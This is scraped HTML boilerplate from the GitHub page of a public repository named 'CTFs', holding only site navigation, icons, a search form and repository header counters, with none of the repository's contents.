<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
Blog
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
</div>
<button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Solutions <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4"> For
Enterprise
Teams
Startups
Education
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
By Solution
CI/CD & Automation
DevOps
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
DevSecOps
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
Case Studies
Customer Stories
Resources
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
</div>
<button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Open Source <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4">
<div> <div class="color-fg-default h4">GitHub Sponsors</div> Fund open source developers </div>
<div> <div class="color-fg-default h4">The ReadME Project</div> GitHub community articles </div>
Repositories
Topics
Trending
Collections
</div>
Pricing
</nav>
<div class="d-lg-flex flex-items-center px-3 px-lg-0 mb-3 mb-lg-0 text-center text-lg-left"> <div class="d-lg-flex min-width-0 mb-2 mb-lg-0">
<div class="header-search flex-auto position-relative js-site-search flex-self-stretch flex-md-self-auto mb-3 mb-md-0 mr-0 mr-md-3 scoped-search site-scoped-search js-jump-to"> <div class="position-relative"> </option></form><form class="js-site-search-form" role="search" aria-label="Site" data-scope-type="Repository" data-scope-id="102334842" data-scoped-search-url="/AnisBoss/CTFs/search" data-owner-scoped-search-url="/users/AnisBoss/search" data-unscoped-search-url="/search" data-turbo="false" action="/AnisBoss/CTFs/search" accept-charset="UTF-8" method="get"> <label class="form-control header-search-wrapper input-sm p-0 js-chromeless-input-container header-search-wrapper-jump-to position-relative d-flex flex-justify-between flex-items-center"> <input type="text" class="form-control js-site-search-focus header-search-input jump-to-field js-jump-to-field js-site-search-field is-clearable" data-hotkey=s,/ name="q" placeholder="Search" data-unscoped-placeholder="Search GitHub" data-scoped-placeholder="Search" autocapitalize="off" role="combobox" aria-haspopup="listbox" aria-expanded="false" aria-autocomplete="list" aria-controls="jump-to-results" aria-label="Search" data-jump-to-suggestions-path="/_graphql/GetSuggestedNavigationDestinations" spellcheck="false" autocomplete="off" > <input type="hidden" data-csrf="true" class="js-data-jump-to-suggestions-path-csrf" value="L85sZbO52CVlLdzBzxtI6y04IX1dUUkmUdgFCiuMbWIPglz8lbzP8deF7gIsZ41/VAg1QQsv6yy7C1JBkNHJuA==" /> <input type="hidden" class="js-site-search-type-field" name="type" > <svg xmlns="http://www.w3.org/2000/svg" width="22" height="20" aria-hidden="true" class="mr-1 header-search-key-slash"><path fill="none" stroke="#979A9C" opacity=".4" d="M3.5.5h12c1.7 0 3 1.3 3 3v13c0 1.7-1.3 3-3 3h-12c-1.7 0-3-1.3-3-3v-13c0-1.7 1.3-3 3-3z"></path><path fill="#979A9C" d="M11.8 6L8 15.1h-.9L10.8 6h1z"></path></svg>
<div class="Box position-absolute overflow-hidden d-none jump-to-suggestions js-jump-to-suggestions-container">
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<span>No suggested jump to results</span>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this user </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
</div> </label></form> </div></div>
</div>
<div class="position-relative mr-lg-3 d-lg-inline-block"> Sign in </div>
Sign up </div> </div> </div> </div></header>
</div>
<div id="start-of-content" class="show-on-focus"></div>
<div id="js-flash-container" data-turbo-replace>
<template class="js-flash-template"> <div class="flash flash-full {{ className }}"> <div class="px-2" > <button autofocus class="flash-close js-flash-close" type="button" aria-label="Dismiss this message"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div aria-atomic="true" role="alert" class="js-flash-alert"> <div>{{ message }}</div>
</div> </div></div> </template></div>
<include-fragment class="js-notification-shelf-include-fragment" data-base-src="https://github.com/notifications/beta/shelf"></include-fragment>
<div class="application-main " data-commit-hovercards-enabled data-discussion-hovercards-enabled data-issue-and-pr-hovercards-enabled > <div itemscope itemtype="http://schema.org/SoftwareSourceCode" class=""> <main id="js-repo-pjax-container" >
<div id="repository-container-header" class="pt-3 hide-full-screen" style="background-color: var(--color-page-header-bg);" data-turbo-replace>
<div class="d-flex flex-wrap flex-justify-end mb-3 px-3 px-md-4 px-lg-5" style="gap: 1rem;">
<div class="flex-auto min-width-0 width-fit mr-3"> <div class=" d-flex flex-wrap flex-items-center wb-break-word f3 text-normal"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo color-fg-muted mr-2"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <span> AnisBoss </span> <span>/</span> CTFs
<span></span><span>Public</span> </div>
</div>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-bell mr-2"> <path d="M8 16a2 2 0 0 0 1.985-1.75c.017-.137-.097-.25-.235-.25h-3.5c-.138 0-.252.113-.235.25A2 2 0 0 0 8 16ZM3 5a5 5 0 0 1 10 0v2.947c0 .05.015.098.042.139l1.703 2.555A1.519 1.519 0 0 1 13.482 13H2.518a1.516 1.516 0 0 1-1.263-2.36l1.703-2.554A.255.255 0 0 0 3 7.947Zm5-3.5A3.5 3.5 0 0 0 4.5 5v2.947c0 .346-.102.683-.294.97l-1.703 2.556a.017.017 0 0 0-.003.01l.001.006c0 .002.002.004.004.006l.006.004.007.001h10.964l.007-.001.006-.004.004-.006.001-.007a.017.017 0 0 0-.003-.01l-1.703-2.554a1.745 1.745 0 0 1-.294-.97V5A3.5 3.5 0 0 0 8 1.5Z"></path></svg>Notifications
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo-forked mr-2"> <path d="M5 5.372v.878c0 .414.336.75.75.75h4.5a.75.75 0 0 0 .75-.75v-.878a2.25 2.25 0 1 1 1.5 0v.878a2.25 2.25 0 0 1-2.25 2.25h-1.5v2.128a2.251 2.251 0 1 1-1.5 0V8.5h-1.5A2.25 2.25 0 0 1 3.5 6.25v-.878a2.25 2.25 0 1 1 1.5 0ZM5 3.25a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Zm6.75.75a.75.75 0 1 0 0-1.5.75.75 0 0 0 0 1.5Zm-3 8.75a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Z"></path></svg>Fork <span>0</span>
<div data-view-component="true" class="BtnGroup d-flex"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-star v-align-text-bottom d-inline-block mr-2"> <path d="M8 .25a.75.75 0 0 1 .673.418l1.882 3.815 4.21.612a.75.75 0 0 1 .416 1.279l-3.046 2.97.719 4.192a.751.751 0 0 1-1.088.791L8 12.347l-3.766 1.98a.75.75 0 0 1-1.088-.79l.72-4.194L.818 6.374a.75.75 0 0 1 .416-1.28l4.21-.611L7.327.668A.75.75 0 0 1 8 .25Zm0 2.445L6.615 5.5a.75.75 0 0 1-.564.41l-3.097.45 2.24 2.184a.75.75 0 0 1 .216.664l-.528 3.084 2.769-1.456a.75.75 0 0 1 .698 0l2.77 1.456-.53-3.084a.75.75 0 0 1 .216-.664l2.24-2.183-3.096-.45a.75.75 0 0 1-.564-.41L8 2.694Z"></path></svg><span> Star</span> <span>6</span> <button disabled="disabled" aria-label="You must be signed in to add this repository to a list" type="button" data-view-component="true" class="btn-sm btn BtnGroup-item px-2"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg></button></div>
</div>
<div id="responsive-meta-container" data-turbo-replace></div>
<nav data-pjax="#js-repo-pjax-container" aria-label="Repository" data-view-component="true" class="js-repo-nav js-sidenav-container-pjax js-responsive-underlinenav overflow-hidden UnderlineNav px-3 px-md-4 px-lg-5">
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code UnderlineNav-octicon d-none d-sm-inline"> <path d="m11.28 3.22 4.25 4.25a.75.75 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.275-.326.749.749 0 0 1 .215-.734L13.94 8l-3.72-3.72a.749.749 0 0 1 .326-1.275.749.749 0 0 1 .734.215Zm-6.56 0a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042L2.06 8l3.72 3.72a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L.47 8.53a.75.75 0 0 1 0-1.06Z"></path></svg> <span>Code</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-issue-opened UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 9.5a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path><path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Z"></path></svg> <span>Issues</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-pull-request UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 3.25a2.25 2.25 0 1 1 3 2.122v5.256a2.251 2.251 0 1 1-1.5 0V5.372A2.25 2.25 0 0 1 1.5 3.25Zm5.677-.177L9.573.677A.25.25 0 0 1 10 .854V2.5h1A2.5 2.5 0 0 1 13.5 5v5.628a2.251 2.251 0 1 1-1.5 0V5a1 1 0 0 0-1-1h-1v1.646a.25.25 0 0 1-.427.177L7.177 3.427a.25.25 0 0 1 0-.354ZM3.75 2.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm0 9.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm8.25.75a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Z"></path></svg> <span>Pull requests</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-play UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Zm4.879-2.773 4.264 2.559a.25.25 0 0 1 0 .428l-4.264 2.559A.25.25 0 0 1 6 10.559V5.442a.25.25 0 0 1 .379-.215Z"></path></svg> <span>Actions</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-table UnderlineNav-octicon d-none d-sm-inline"> <path d="M0 1.75C0 .784.784 0 1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25ZM6.5 6.5v8h7.75a.25.25 0 0 0 .25-.25V6.5Zm8-1.5V1.75a.25.25 0 0 0-.25-.25H6.5V5Zm-13 1.5v7.75c0 .138.112.25.25.25H5v-8ZM5 5V1.5H1.75a.25.25 0 0 0-.25.25V5Z"></path></svg> <span>Projects</span> <span>0</span>
